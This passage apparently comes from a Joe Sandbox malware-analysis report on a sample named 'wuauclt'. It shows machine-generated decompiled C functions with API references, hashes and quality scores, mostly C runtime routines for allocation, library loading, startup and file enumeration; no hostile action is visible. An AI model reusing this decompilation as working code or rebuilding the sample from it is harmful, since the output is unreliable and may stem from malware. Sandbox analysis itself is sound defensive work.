                                                									__eflags = _t151;
                                                									if(_t151 < 0) {
                                                										goto L47;
                                                									}
                                                									goto L46;
                                                								}
                                                							}
                                                							goto L23;
                                                						}
                                                					}
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L11;
                                                					} else {
                                                						_t183 = E0025EE9C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                						__eflags = _t183;
                                                						if(_t183 == 0) {
                                                							_t128 = E00267DA0(_t184, 0x65);
                                                							_pop(_t166);
                                                							__eflags = _t128;
                                                							if(_t128 != 0) {
                                                								__eflags = _a28;
                                                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								__eflags = _t170;
                                                								 *_t128 = _t170;
                                                								 *((char*)(_t128 + 3)) = 0;
                                                							}
                                                							_t183 = 0;
                                                						} else {
                                                							 *_t184 = 0;
                                                						}
                                                						goto L62;
                                                					}
                                                				} else {
                                                					_t129 = E0025D495();
                                                					_t183 = 0x22;
                                                					 *_t129 = _t183;
                                                					E0025BA52();
                                                					L62:
                                                					if(_v40 != 0) {
                                                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                					}
                                                					return _t183;
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 18ea945ef78ebb0e7413536fd8ade7f809ff6629e6f6fd62cc1f4a2d91c88840
                                                • Instruction ID: 844c80359f8d7092e0ac5c4afaf5610febf55ee3e0aca73e89a0885f07a4029d
                                                • Opcode Fuzzy Hash: 18ea945ef78ebb0e7413536fd8ade7f809ff6629e6f6fd62cc1f4a2d91c88840
                                                • Instruction Fuzzy Hash: 24A189719343869FDF29CF18C8827AEBBE5EF15312F1A416EDC558B281C2348E59CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E0025C5F7(signed int __eax, void* __ecx) {
                                                				signed int _t2;
                                                				signed int _t3;
                                                				int _t10;
                                                				int _t11;
                                                				void* _t13;
                                                				short** _t16;
                                                				char* _t19;
                                                				void* _t20;
                                                
                                                				_t13 = __ecx;
                                                				_t16 =  *0x273a64; // 0x0
                                                				if(_t16 != 0) {
                                                					_t10 = 0;
                                                					while( *_t16 != _t10) {
                                                						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                                                						_t11 = _t2;
                                                						if(_t11 == 0) {
                                                							L11:
                                                							_t3 = _t2 | 0xffffffff;
                                                						} else {
                                                							_t19 = E0025D3BF(_t13, _t11, 1);
                                                							_pop(_t13);
                                                							if(_t19 == 0) {
                                                								L10:
                                                								_t2 = E0025D2F4(_t19);
                                                								goto L11;
                                                							} else {
                                                								_t10 = 0;
                                                								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                                                									goto L10;
                                                								} else {
                                                									_push(0);
                                                									_push(_t19);
                                                									E0026081C();
                                                									E0025D2F4(0);
                                                									_t20 = _t20 + 0xc;
                                                									_t16 =  &(_t16[1]);
                                                									continue;
                                                								}
                                                							}
                                                						}
                                                						L9:
                                                						return _t3;
                                                						goto L12;
                                                					}
                                                					_t3 = 0;
                                                					goto L9;
                                                				} else {
                                                					return __eax | 0xffffffff;
                                                				}
                                                				L12:
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f18a4853bd45119ccdbc98f69f0ba9050db7cec8d98d714276d083ca64dfb79
                                                • Instruction ID: 6a309bb0a68ffa9c9394ab834ff834a33a039fbdd319426fdbd4a12e0fd33968
                                                • Opcode Fuzzy Hash: 9f18a4853bd45119ccdbc98f69f0ba9050db7cec8d98d714276d083ca64dfb79
                                                • Instruction Fuzzy Hash: DC01D8B22293173EEA2029787CC5F27620DDB81776B301725B921611C1EBB08E64456C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E0025D55E(signed int _a4) {
                                                				signed int _t9;
                                                				void* _t13;
                                                				signed int _t15;
                                                				WCHAR* _t22;
                                                				signed int _t24;
                                                				signed int* _t25;
                                                				void* _t27;
                                                
                                                				_t9 = _a4;
                                                				_t25 = 0x273ab8 + _t9 * 4;
                                                				_t24 =  *_t25;
                                                				if(_t24 == 0) {
                                                					_t22 =  *(0x26a1b8 + _t9 * 4);
                                                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                					if(_t27 != 0) {
                                                						L8:
                                                						 *_t25 = _t27;
                                                						if( *_t25 != 0) {
                                                							FreeLibrary(_t27);
                                                						}
                                                						_t13 = _t27;
                                                						L11:
                                                						return _t13;
                                                					}
                                                					_t15 = GetLastError();
                                                					if(_t15 != 0x57) {
                                                						_t27 = 0;
                                                					} else {
                                                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                						_t27 = _t15;
                                                					}
                                                					if(_t27 != 0) {
                                                						goto L8;
                                                					} else {
                                                						 *_t25 = _t15 | 0xffffffff;
                                                						_t13 = 0;
                                                						goto L11;
                                                					}
                                                				}
                                                				_t4 = _t24 + 1; // 0x80aab37d
                                                				asm("sbb eax, eax");
                                                				return  ~_t4 & _t24;
                                                			}











                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0025A5BB,00000000,00000000,?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue), ref: 0025D590
                                                • GetLastError.KERNEL32(?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue,0026A688,0026A690,00000000,00000364,?,0025EA38), ref: 0025D59C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue,0026A688,0026A690,00000000), ref: 0025D5AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 0bd0a25f52821dfacca65d600968ed2f88a8672f1190642440403cefc0549fc8
                                                • Instruction ID: e36d692e79d3362f5307a3701513738e1ca1ab48a503b6d8f7c10a3e82b93fff
                                                • Opcode Fuzzy Hash: 0bd0a25f52821dfacca65d600968ed2f88a8672f1190642440403cefc0549fc8
                                                • Instruction Fuzzy Hash: F1014C726252275BC7319F68AC0CA56379CAF017A67610520FD0AD7280EB70C929C6E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E002550A0(void* __ebx, void* __edx, void* __edi, signed int _a4) {
                                                				signed int _v0;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t27;
                                                				signed int _t33;
                                                				signed int _t34;
                                                				signed int _t41;
                                                				signed int _t45;
                                                				void* _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				void* _t59;
                                                				void* _t66;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				void* _t71;
                                                				signed int _t72;
                                                				void* _t76;
                                                
                                                				_t66 = __edi;
                                                				_t59 = __edx;
                                                				_t46 = __ebx;
                                                				_t27 = _a4;
                                                				if(_t27 != 0) {
                                                					__eflags = _t27 - 0xffffffff;
                                                					if(__eflags > 0) {
                                                						E00257EA5(__eflags);
                                                						goto L10;
                                                					} else {
                                                						__eflags = _t27 - 0x1000;
                                                						if(__eflags < 0) {
                                                							_t27 = E002570A8(_t71, __eflags, _t27);
                                                							_t76 = _t76 + 4;
                                                							__eflags = _t27;
                                                							if(__eflags != 0) {
                                                								goto L1;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t2 = _t27 + 0x23; // 0x25501f
                                                							_t52 = _t2;
                                                							__eflags = _t52 - _t27;
                                                							if(__eflags <= 0) {
                                                								L10:
                                                								E00257EA5(__eflags);
                                                								goto L11;
                                                							} else {
                                                								_t52 = E002570A8(_t71, __eflags, _t52);
                                                								_t76 = _t76 + 4;
                                                								__eflags = _t52;
                                                								if(__eflags == 0) {
                                                									L11:
                                                									E0025BA62(_t46, _t52, _t59, _t66, __eflags);
                                                									L12:
                                                									E0025BA62(_t46, _t52, _t59, _t66, __eflags);
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									_push(_t46);
                                                									_push(_t71);
                                                									_t72 = _t52;
                                                									_t33 = _v0 - 1;
                                                									__eflags = _t33;
                                                									_t53 = _v0;
                                                									_push(_t66);
                                                									do {
                                                										_t67 = 0;
                                                										_t47 = 0;
                                                										__eflags = _t33;
                                                										if(_t33 != 0) {
                                                											do {
                                                												_t56 =  *((intOrPtr*)(_t72 + 4)) - 1;
                                                												_t70 = (_t67 <<  *((intOrPtr*)(_t72 + 4)) - 1) + (_t67 <<  *((intOrPtr*)(_t72 + 4)) - 1);
                                                												__eflags = _t70;
                                                												do {
                                                													_t41 = E00257F02(_t56, __eflags);
                                                													__eflags = _t41 -  *(_t72 + 8);
                                                												} while (__eflags > 0);
                                                												_t67 = _t70 | _t41;
                                                												_t53 = _v0;
                                                												_t47 = (_t47 <<  *((intOrPtr*)(_t72 + 4)) - 0x00000001) + (_t47 <<  *((intOrPtr*)(_t72 + 4)) - 0x00000001) |  *(_t72 + 8);
                                                												_t12 = _t53 - 1; // -1
                                                												__eflags = _t47 - _t12;
                                                											} while (_t47 < _t12);
                                                										}
                                                										_t34 = _t47;
                                                										_t48 = _t34 % _t53;
                                                										__eflags = _t67 / _v0 - _t34 / _t53;
                                                										_t53 = _v0;
                                                										if(__eflags >= 0) {
                                                											goto L19;
                                                										}
                                                										break;
                                                										L19:
                                                										_t24 = _t53 - 1; // 0x254ffb
                                                										_t33 = _t24;
                                                										__eflags = _t48 - _t33;
                                                									} while (_t48 != _t33);
                                                									_t26 = _t67 % _t53;
                                                									__eflags = _t26;
                                                									return _t26;
                                                								} else {
                                                									_t3 = _t52 + 0x23; // 0x23
                                                									_t45 = _t3 & 0xffffffe0;
                                                									__eflags = _t45;
                                                									 *(_t45 - 4) = _t52;
                                                									return _t45;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return _t27;
                                                				}
                                                			}
























                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f7953424a9ec5fdeb2c14d626db20bc09a55e7a0c64c0f3b1c43eec529bc13a
                                                • Instruction ID: aacc533a2325c98070f2a341b06504db240d7bcea1d384f1ef6e1075f295ffd1
                                                • Opcode Fuzzy Hash: 9f7953424a9ec5fdeb2c14d626db20bc09a55e7a0c64c0f3b1c43eec529bc13a
                                                • Instruction Fuzzy Hash: D2F0AEB157471645DB18BB70946751E338C4D18367B100239BD25C61D1FB31DD7D899E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E002572F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t4;
                                                				void* _t6;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t28;
                                                
                                                				_t30 = __edi;
                                                				_t29 = __edx;
                                                				_t25 = __ecx;
                                                				_t24 = __ebx;
                                                				_push(__esi);
                                                				E0025C0BD(1);
                                                				E0025CA8E(E00257921());
                                                				_t4 = E0025CBE4();
                                                				 *_t4 = E00257927();
                                                				_t6 = E002576C8(__ebx, __edx, __edi, _t4, 1);
                                                				_t37 = _t6;
                                                				if(_t6 == 0) {
                                                					L5:
                                                					E00257993(_t29, _t30, 7);
                                                					asm("int3");
                                                					E0025795E();
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					asm("fclex");
                                                					E00257B03();
                                                					E0025786C(_t37, E00257B2E);
                                                					_push(E0025791D());
                                                					_t13 = E0025C464(_t25, __edx);
                                                					_pop(_t27);
                                                					if(_t13 != 0) {
                                                						goto L5;
                                                					} else {
                                                						E0025792A(_t13);
                                                						_t15 = E0025797B();
                                                						_t39 = _t15;
                                                						if(_t15 != 0) {
                                                							_t15 = E0025C161(E00257927);
                                                							_pop(_t27);
                                                						}
                                                						E00257957(E00257957(_t15));
                                                						E00257936(_t29, _t30, _t39);
                                                						E0025CB4D(_t27, _t29, E00257927());
                                                						_pop(_t28);
                                                						L0025C73C(_t24, _t28);
                                                						E00257927();
                                                						return 0;
                                                					}
                                                				}
                                                			}











                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 00257319
                                                • __RTC_Initialize.LIBCMT ref: 00257328
                                                  • Part of subcall function 0025786C: __onexit.LIBCMT ref: 00257872
                                                  • Part of subcall function 0025792A: InitializeSListHead.KERNEL32(00273860,0025734D), ref: 0025792F
                                                • ___scrt_fastfail.LIBCMT ref: 0025738B
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 00257391
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: 7ee4178655372b50bae5cb01c5ccaf58518812ca75d2be45c9f4c20cfcf725cd
                                                • Instruction ID: b619f07ec7c95afe189a2403e9ae88c8c8c36fead077fe25ee01f7370d9dc95b
                                                • Opcode Fuzzy Hash: 7ee4178655372b50bae5cb01c5ccaf58518812ca75d2be45c9f4c20cfcf725cd
                                                • Instruction Fuzzy Hash: 42F0E7559FD31268DE2037F1780BA5E11484F20B27F240855BD44A6083FD79C47C9CBE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0025F70F(void* __ebx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                				intOrPtr _v0;
                                                				char _v6;
                                                				char _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v36;
                                                				intOrPtr* _v64;
                                                				intOrPtr _v96;
                                                				intOrPtr* _v100;
                                                				CHAR* _v104;
                                                				signed int _v116;
                                                				char _v290;
                                                				signed int _v291;
                                                				struct _WIN32_FIND_DATAA _v336;
                                                				union _FINDEX_INFO_LEVELS _v340;
                                                				signed int _v344;
                                                				signed int _v348;
                                                				intOrPtr _v440;
                                                				void* __esi;
                                                				intOrPtr* _t80;
                                                				signed int _t82;
                                                				signed int _t87;
                                                				signed int _t91;
                                                				signed int _t93;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t100;
                                                				signed int _t103;
                                                				signed int _t108;
                                                				signed int _t111;
                                                				intOrPtr _t113;
                                                				signed char _t115;
                                                				union _FINDEX_INFO_LEVELS _t123;
                                                				signed int _t128;
                                                				signed int _t131;
                                                				void* _t137;
                                                				void* _t139;
                                                				signed int _t140;
                                                				signed int _t143;
                                                				signed int _t145;
                                                				signed int _t147;
                                                				signed int* _t148;
                                                				signed int _t151;
                                                				void* _t154;
                                                				CHAR* _t155;
                                                				char _t158;
                                                				char _t160;
                                                				intOrPtr* _t163;
                                                				void* _t164;
                                                				intOrPtr* _t165;
                                                				signed int _t167;
                                                				void* _t169;
                                                				intOrPtr* _t170;
                                                				signed int _t174;
                                                				signed int _t178;
                                                				signed int _t179;
                                                				intOrPtr* _t184;
                                                				void* _t193;
                                                				intOrPtr _t194;
                                                				signed int _t196;
                                                				signed int _t197;
                                                				signed int _t199;
                                                				signed int _t200;
                                                				signed int _t202;
                                                				union _FINDEX_INFO_LEVELS _t203;
                                                				signed int _t208;
                                                				signed int _t210;
                                                				signed int _t211;
                                                				void* _t213;
                                                				intOrPtr _t214;
                                                				void* _t215;
                                                				void* _t216;
                                                				signed int _t219;
                                                				void* _t221;
                                                				signed int _t222;
                                                				void* _t223;
                                                				void* _t224;
                                                				void* _t225;
                                                				signed int _t226;
                                                				void* _t227;
                                                				void* _t228;
                                                
                                                				_t80 = _a8;
                                                				_t224 = _t223 - 0x20;
                                                				if(_t80 != 0) {
                                                					_t208 = _a4;
                                                					_t160 = 0;
                                                					 *_t80 = 0;
                                                					_t199 = 0;
                                                					_t151 = 0;
                                                					_v36 = 0;
                                                					_v336.cAlternateFileName = 0;
                                                					_v28 = 0;
                                                					__eflags =  *_t208;
                                                					if( *_t208 == 0) {
                                                						L9:
                                                						_v12 = _v12 & 0x00000000;
                                                						_t82 = _t151 - _t199;
                                                						_v8 = _t160;
                                                						_t191 = (_t82 >> 2) + 1;
                                                						__eflags = _t151 - _t199;
                                                						_v16 = (_t82 >> 2) + 1;
                                                						asm("sbb esi, esi");
                                                						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                						__eflags = _t210;
                                                						if(_t210 != 0) {
                                                							_t197 = _t199;
                                                							_t158 = _t160;
                                                							do {
                                                								_t184 =  *_t197;
                                                								_t17 = _t184 + 1; // 0x1
                                                								_v8 = _t17;
                                                								do {
                                                									_t143 =  *_t184;
                                                									_t184 = _t184 + 1;
                                                									__eflags = _t143;
                                                								} while (_t143 != 0);
                                                								_t158 = _t158 + 1 + _t184 - _v8;
                                                								_t197 = _t197 + 4;
                                                								_t145 = _v12 + 1;
                                                								_v12 = _t145;
                                                								__eflags = _t145 - _t210;
                                                							} while (_t145 != _t210);
                                                							_t191 = _v16;
                                                							_v8 = _t158;
                                                							_t151 = _v336.cAlternateFileName;
                                                						}
                                                						_t211 = E0025C40F(_t191, _v8, 1);
                                                						_t225 = _t224 + 0xc;
                                                						__eflags = _t211;
                                                						if(_t211 != 0) {
                                                							_t87 = _t211 + _v16 * 4;
                                                							_v20 = _t87;
                                                							_t192 = _t87;
                                                							_v16 = _t87;
                                                							__eflags = _t199 - _t151;
                                                							if(_t199 == _t151) {
                                                								L23:
                                                								_t200 = 0;
                                                								__eflags = 0;
                                                								 *_a8 = _t211;
                                                								goto L24;
                                                							} else {
                                                								_t93 = _t211 - _t199;
                                                								__eflags = _t93;
                                                								_v24 = _t93;
                                                								do {
                                                									_t163 =  *_t199;
                                                									_v12 = _t163 + 1;
                                                									do {
                                                										_t95 =  *_t163;
                                                										_t163 = _t163 + 1;
                                                										__eflags = _t95;
                                                									} while (_t95 != 0);
                                                									_t164 = _t163 - _v12;
                                                									_t35 = _t164 + 1; // 0x1
                                                									_t96 = _t35;
                                                									_push(_t96);
                                                									_v12 = _t96;
                                                									_t100 = E002648FB(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                									_t225 = _t225 + 0x10;
                                                									__eflags = _t100;
                                                									if(_t100 != 0) {
                                                										_push(0);
                                                										_push(0);
                                                										_push(0);
                                                										_push(0);
                                                										_push(0);
                                                										E0025BA7F();
                                                										asm("int3");
                                                										_t221 = _t225;
                                                										_push(_t164);
                                                										_t165 = _v64;
                                                										_t47 = _t165 + 1; // 0x1
                                                										_t193 = _t47;
                                                										do {
                                                											_t103 =  *_t165;
                                                											_t165 = _t165 + 1;
                                                											__eflags = _t103;
                                                										} while (_t103 != 0);
                                                										_push(_t199);
                                                										_t202 = _a8;
                                                										_t167 = _t165 - _t193 + 1;
                                                										_v12 = _t167;
                                                										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                											_push(_t151);
                                                											_t50 = _t202 + 1; // 0x1
                                                											_t154 = _t50 + _t167;
                                                											_t213 = E0025D3BF(_t167, _t154, 1);
                                                											_t169 = _t211;
                                                											__eflags = _t202;
                                                											if(_t202 == 0) {
                                                												L34:
                                                												_push(_v12);
                                                												_t154 = _t154 - _t202;
                                                												_t108 = E002648FB(_t169, _t213 + _t202, _t154, _v0);
                                                												_t226 = _t225 + 0x10;
                                                												__eflags = _t108;
                                                												if(__eflags != 0) {
                                                													goto L37;
                                                												} else {
                                                													_t137 = E0025FADE(_a12, __eflags, _t213);
                                                													E0025D2F4(0);
                                                													_t139 = _t137;
                                                													goto L36;
                                                												}
                                                											} else {
                                                												_push(_t202);
                                                												_t140 = E002648FB(_t169, _t213, _t154, _a4);
                                                												_t226 = _t225 + 0x10;
                                                												__eflags = _t140;
                                                												if(_t140 != 0) {
                                                													L37:
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													E0025BA7F();
                                                													asm("int3");
                                                													_push(_t221);
                                                													_t222 = _t226;
                                                													_t227 = _t226 - 0x150;
                                                													_t111 =  *0x271004; // 0x80aab37c
                                                													_v116 = _t111 ^ _t222;
                                                													_t170 = _v100;
                                                													_push(_t154);
                                                													_t155 = _v104;
                                                													_push(_t213);
                                                													_t214 = _v96;
                                                													_push(_t202);
                                                													_v440 = _t214;
                                                													while(1) {
                                                														__eflags = _t170 - _t155;
                                                														if(_t170 == _t155) {
                                                															break;
                                                														}
                                                														_t113 =  *_t170;
                                                														__eflags = _t113 - 0x2f;
                                                														if(_t113 != 0x2f) {
                                                															__eflags = _t113 - 0x5c;
                                                															if(_t113 != 0x5c) {
                                                																__eflags = _t113 - 0x3a;
                                                																if(_t113 != 0x3a) {
                                                																	_t170 = E00264950(_t155, _t170);
                                                																	continue;
                                                																}
                                                															}
                                                														}
                                                														break;
                                                													}
                                                													_t194 =  *_t170;
                                                													__eflags = _t194 - 0x3a;
                                                													if(_t194 != 0x3a) {
                                                														L47:
                                                														_t203 = 0;
                                                														__eflags = _t194 - 0x2f;
                                                														if(_t194 == 0x2f) {
                                                															L51:
                                                															_t115 = 1;
                                                															__eflags = 1;
                                                														} else {
                                                															__eflags = _t194 - 0x5c;
                                                															if(_t194 == 0x5c) {
                                                																goto L51;
                                                															} else {
                                                																__eflags = _t194 - 0x3a;
                                                																if(_t194 == 0x3a) {
                                                																	goto L51;
                                                																} else {
                                                																	_t115 = 0;
                                                																}
                                                															}
                                                														}
                                                														asm("sbb eax, eax");
                                                														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                														E002596C0(_t203,  &_v336, _t203, 0x140);
                                                														_t228 = _t227 + 0xc;
                                                														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                														_t123 = _v340;
                                                														__eflags = _t215 - 0xffffffff;
                                                														if(_t215 != 0xffffffff) {
                                                															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                															__eflags = _t174;
                                                															_v348 = _t174 >> 2;
                                                															do {
                                                																__eflags = _v336.cFileName - 0x2e;
                                                																if(_v336.cFileName != 0x2e) {
                                                																	L64:
                                                																	_push(_t123);
                                                																	_push(_v344);
                                                																	_t123 =  &(_v336.cFileName);
                                                																	_push(_t155);
                                                																	_push(_t123);
                                                																	L28();
                                                																	_t228 = _t228 + 0x10;
                                                																	__eflags = _t123;
                                                																	if(_t123 != 0) {
                                                																		goto L54;
                                                																	} else {
                                                																		goto L65;
                                                																	}
                                                																} else {
                                                																	_t178 = _v291;
                                                																	__eflags = _t178;
                                                																	if(_t178 == 0) {
                                                																		goto L65;
                                                																	} else {
                                                																		__eflags = _t178 - 0x2e;
                                                																		if(_t178 != 0x2e) {
                                                																			goto L64;
                                                																		} else {
                                                																			__eflags = _v290;
                                                																			if(_v290 == 0) {
                                                																				goto L65;
                                                																			} else {
                                                																				goto L64;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                																goto L58;
                                                																L65:
                                                																_t128 = FindNextFileA(_t215,  &_v336);
                                                																__eflags = _t128;
                                                																_t123 = _v340;
                                                															} while (_t128 != 0);
                                                															_t195 =  *_t123;
                                                															_t179 = _v348;
                                                															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                															__eflags = _t179 - _t131;
                                                															if(_t179 != _t131) {
                                                																E002644B0(_t155, _t203, _t195 + _t179 * 4, _t131 - _t179, 4, E0025F6F7);
                                                															}
                                                														} else {
                                                															_push(_t123);
                                                															_push(_t203);
                                                															_push(_t203);
                                                															_push(_t155);
                                                															L28();
                                                															L54:
                                                															_t203 = _t123;
                                                														}
                                                														__eflags = _t215 - 0xffffffff;
                                                														if(_t215 != 0xffffffff) {
                                                															FindClose(_t215);
                                                														}
                                                													} else {
                                                														__eflags = _t170 -  &(_t155[1]);
                                                														if(_t170 ==  &(_t155[1])) {
                                                															goto L47;
                                                														} else {
                                                															_push(_t214);
                                                															_push(0);
                                                															_push(0);
                                                															_push(_t155);
                                                															L28();
                                                														}
                                                													}
                                                													L58:
                                                													_pop(_t216);
                                                													__eflags = _v16 ^ _t222;
                                                													return E00257097(_v16 ^ _t222, _t216);
                                                												} else {
                                                													goto L34;
                                                												}
                                                											}
                                                										} else {
                                                											_t139 = 0xc;
                                                											L36:
                                                											return _t139;
                                                										}
                                                									} else {
                                                										goto L22;
                                                									}
                                                									goto L68;
                                                									L22:
                                                									_t196 = _v16;
                                                									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                									_t199 = _t199 + 4;
                                                									_t192 = _t196 + _v12;
                                                									_v16 = _t196 + _v12;
                                                									__eflags = _t199 - _t151;
                                                								} while (_t199 != _t151);
                                                								goto L23;
                                                							}
                                                						} else {
                                                							_t200 = _t199 | 0xffffffff;
                                                							L24:
                                                							E0025D2F4(0);
                                                							goto L25;
                                                						}
                                                					} else {
                                                						while(1) {
                                                							_v8 = 0x3f2a;
                                                							_v6 = _t160;
                                                							_t147 = E00264910( *_t208,  &_v8);
                                                							__eflags = _t147;
                                                							if(_t147 != 0) {
                                                								_push( &_v36);
                                                								_push(_t147);
                                                								_push( *_t208);
                                                								L38();
                                                								_t224 = _t224 + 0xc;
                                                							} else {
                                                								_t147 =  &_v36;
                                                								_push(_t147);
                                                								_push(0);
                                                								_push(0);
                                                								_push( *_t208);
                                                								L28();
                                                								_t224 = _t224 + 0x10;
                                                							}
                                                							_t200 = _t147;
                                                							__eflags = _t200;
                                                							if(_t200 != 0) {
                                                								break;
                                                							}
                                                							_t208 = _t208 + 4;
                                                							_t160 = 0;
                                                							__eflags =  *_t208;
                                                							if( *_t208 != 0) {
                                                								continue;
                                                							} else {
                                                								_t151 = _v336.cAlternateFileName;
                                                								_t199 = _v36;
                                                								goto L9;
                                                							}
                                                							goto L68;
                                                						}
